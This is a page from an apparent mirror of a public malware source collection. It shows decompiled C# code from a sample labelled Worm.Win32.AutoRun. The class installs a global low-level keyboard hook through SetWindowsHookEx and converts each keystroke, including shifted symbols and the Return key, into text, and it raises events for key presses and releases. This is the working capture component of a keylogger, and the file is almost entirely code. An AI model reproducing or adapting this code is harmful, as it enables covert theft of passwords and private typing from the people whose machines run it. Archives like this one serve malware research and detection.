mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 21:35:27 +00:00
f2ac1ece55
add
217 lines
7.1 KiB
C#
217 lines
7.1 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: clannad
|
|
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.Reflection;
|
|
using System.Runtime.InteropServices;
|
|
using System.Windows.Forms;
|
|
|
|
public class clannad
|
|
{
|
|
private static int Key;
|
|
private static clannad.KDel KHD;
|
|
|
|
[DebuggerNonUserCode]
|
|
public clannad()
|
|
{
|
|
}
|
|
|
|
[DllImport("user32", EntryPoint = "SetWindowsHookExA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern int SetWindowsHookEx(
|
|
int Hook,
|
|
clannad.KDel KeyDelegate,
|
|
int HMod,
|
|
int ThreadId);
|
|
|
|
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern int CallNextHookEx(
|
|
int Hook,
|
|
int nCode,
|
|
int wParam,
|
|
ref clannad.KeyStructure lParam);
|
|
|
|
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern int UnhookWindowsHookEx(int Hook);
|
|
|
|
public static event clannad.DownEventHandler Down;
|
|
|
|
public static event clannad.UpEventHandler Up;
|
|
|
|
public void CreateHook()
|
|
{
|
|
clannad.KHD = new clannad.KDel(this.Proc);
|
|
clannad.Key = clannad.SetWindowsHookEx(13, clannad.KHD, Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]).ToInt32(), 0);
|
|
}
|
|
|
|
private int Proc(int Code, int wParam, ref clannad.KeyStructure lParam)
|
|
{
|
|
if (Code == 0)
|
|
{
|
|
switch (wParam)
|
|
{
|
|
case 256:
|
|
case 260:
|
|
clannad.DownEventHandler downEvent = clannad.DownEvent;
|
|
if (downEvent != null)
|
|
{
|
|
downEvent(this.Feed((Keys) lParam.Code));
|
|
break;
|
|
}
|
|
break;
|
|
case 257:
|
|
case 261:
|
|
clannad.UpEventHandler upEvent = clannad.UpEvent;
|
|
if (upEvent != null)
|
|
{
|
|
upEvent(this.Feed((Keys) lParam.Code));
|
|
break;
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
return clannad.CallNextHookEx(clannad.Key, Code, wParam, ref lParam);
|
|
}
|
|
|
|
public void DiposeHook()
|
|
{
|
|
clannad.UnhookWindowsHookEx(clannad.Key);
|
|
// ISSUE: explicit finalizer call
|
|
this.Finalize();
|
|
}
|
|
|
|
private string Feed(Keys e)
|
|
{
|
|
Keys keys = e;
|
|
if (keys >= Keys.A && keys <= Keys.Z)
|
|
return Control.IsKeyLocked(Keys.Capital) | (Control.ModifierKeys & Keys.Shift) != Keys.None ? e.ToString() : e.ToString().ToLower();
|
|
if (keys >= Keys.D0 && keys <= Keys.D9)
|
|
{
|
|
if ((Control.ModifierKeys & Keys.Shift) == Keys.None)
|
|
return e.ToString().Replace("D", (string) null);
|
|
string Left = e.ToString();
|
|
if (Operators.CompareString(Left, "D1", false) == 0)
|
|
return "!";
|
|
if (Operators.CompareString(Left, "D2", false) == 0)
|
|
return "@";
|
|
if (Operators.CompareString(Left, "D3", false) == 0)
|
|
return "#";
|
|
if (Operators.CompareString(Left, "D4", false) == 0)
|
|
return "$";
|
|
if (Operators.CompareString(Left, "D5", false) == 0)
|
|
return "%";
|
|
if (Operators.CompareString(Left, "D6", false) == 0)
|
|
return "^";
|
|
if (Operators.CompareString(Left, "D7", false) == 0)
|
|
return "&";
|
|
if (Operators.CompareString(Left, "D8", false) == 0)
|
|
return "*";
|
|
if (Operators.CompareString(Left, "D9", false) == 0)
|
|
return "(";
|
|
if (Operators.CompareString(Left, "D0", false) == 0)
|
|
return ")";
|
|
}
|
|
else
|
|
{
|
|
if (keys >= Keys.NumPad0 && keys <= Keys.NumPad9)
|
|
return e.ToString().Replace("NumPad", (string) null);
|
|
if (keys >= Keys.Multiply && keys <= Keys.Divide)
|
|
{
|
|
string Left = e.ToString();
|
|
if (Operators.CompareString(Left, "Divide", false) == 0)
|
|
return "/";
|
|
if (Operators.CompareString(Left, "Multiply", false) == 0)
|
|
return "*";
|
|
if (Operators.CompareString(Left, "Subtract", false) == 0)
|
|
return "-";
|
|
if (Operators.CompareString(Left, "Add", false) == 0)
|
|
return "+";
|
|
if (Operators.CompareString(Left, "Decimal", false) == 0)
|
|
return ".";
|
|
}
|
|
else
|
|
{
|
|
if (keys == Keys.Space)
|
|
return " ";
|
|
if (keys >= Keys.OemSemicolon && keys <= Keys.OemQuotes)
|
|
{
|
|
if ((Control.ModifierKeys & Keys.Shift) != Keys.None)
|
|
{
|
|
string Left = e.ToString();
|
|
if (Operators.CompareString(Left, "OemMinus", false) == 0)
|
|
return "_";
|
|
if (Operators.CompareString(Left, "Oemplus", false) == 0)
|
|
return "+";
|
|
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
|
|
return "{";
|
|
if (Operators.CompareString(Left, "Oem6", false) == 0)
|
|
return "}";
|
|
if (Operators.CompareString(Left, "Oem5", false) == 0)
|
|
return "|";
|
|
if (Operators.CompareString(Left, "Oem1", false) == 0)
|
|
return ":";
|
|
if (Operators.CompareString(Left, "Oem7", false) == 0)
|
|
return "\"";
|
|
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
|
|
return "<";
|
|
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
|
|
return ">";
|
|
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
|
|
return "?";
|
|
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
|
|
return "~";
|
|
}
|
|
else
|
|
{
|
|
string Left = e.ToString();
|
|
if (Operators.CompareString(Left, "OemMinus", false) == 0)
|
|
return "-";
|
|
if (Operators.CompareString(Left, "Oemplus", false) == 0)
|
|
return "=";
|
|
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
|
|
return "[";
|
|
if (Operators.CompareString(Left, "Oem6", false) == 0)
|
|
return "]";
|
|
if (Operators.CompareString(Left, "Oem5", false) == 0)
|
|
return "\\";
|
|
if (Operators.CompareString(Left, "Oem1", false) == 0)
|
|
return ";";
|
|
if (Operators.CompareString(Left, "Oem7", false) == 0)
|
|
return "'";
|
|
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
|
|
return ",";
|
|
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
|
|
return ".";
|
|
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
|
|
return "/";
|
|
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
|
|
return "`";
|
|
}
|
|
}
|
|
else
|
|
return keys == Keys.Return ? Environment.NewLine : "<" + e.ToString() + ">";
|
|
}
|
|
}
|
|
return (string) null;
|
|
}
|
|
|
|
private delegate int KDel(int nCode, int wParam, ref clannad.KeyStructure lParam);
|
|
|
|
public delegate void DownEventHandler(string Key);
|
|
|
|
public delegate void UpEventHandler(string Key);
|
|
|
|
private struct KeyStructure
|
|
{
|
|
public int Code;
|
|
public int ScanCode;
|
|
public int Flags;
|
|
public int Time;
|
|
public int ExtraInfo;
|
|
}
|
|
}
|